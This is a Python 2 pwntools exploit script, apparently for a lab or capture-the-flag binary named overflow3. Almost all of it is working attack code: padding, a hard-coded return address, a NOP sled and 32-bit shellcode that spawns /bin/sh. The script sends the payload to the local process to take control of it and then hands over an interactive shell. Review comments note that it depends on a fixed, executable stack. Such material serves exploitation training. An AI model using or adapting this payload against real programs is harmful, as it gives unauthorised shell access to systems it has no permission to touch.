#!/usr/bin/python

from pwn import *

def main():
    """Run ./overflow3 locally and send it a 100-byte stack-overflow input.

    Payload layout, in order: 28 filler bytes, a 4-byte packed return
    address, a run of 0x90 (NOP) bytes, then the shellcode. The NOP run is
    sized so the whole payload comes to 100 bytes.

    NOTE(review): the return address is a hard-coded stack address
    (0xffffd620 + 28 + 4), presumably taken from a debugger session. It can
    only be correct when the target's stack sits at a fixed address and is
    executable, i.e. a lab binary without ASLR/NX. Confirm against the
    build flags of overflow3.

    NOTE(review): the str + p32() concatenation below relies on Python 2
    byte-string semantics.
    """
    # start the target as a local child process
    target = process("./overflow3")

    # Address that overwrites the saved return pointer: 32 bytes past the
    # base, which is where the NOP run begins in the layout built below.
    #ret_address = 0x5655554d
    stack_base = 0xffffd620
    ret_address = stack_base + 28 + 4

    # 32-bit Linux x86 machine code ending in the literal "/bin/sh"
    # (presumably an execve via int 0x80; verify by disassembling).
    shellcode = (
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh"
    )

    # filler up to the saved return pointer, then the replacement address
    overwrite = "A" * 28 + p32(ret_address)

    # NOP bytes fill whatever is left of the 100-byte budget
    sled_len = 100 - len(overwrite) - len(shellcode)
    payload = overwrite + "\x90" * sled_len + shellcode

    # debugging aid: print the pid and pause so a debugger can attach
    #raw_input(str(target.proc.pid))

    # deliver the payload on the target's stdin
    target.send(payload)

    # pass interaction back to the user
    target.interactive()

# Run main() only when executed as a script, so importing this module does
# not start the target process.
if __name__ == "__main__":
    main()

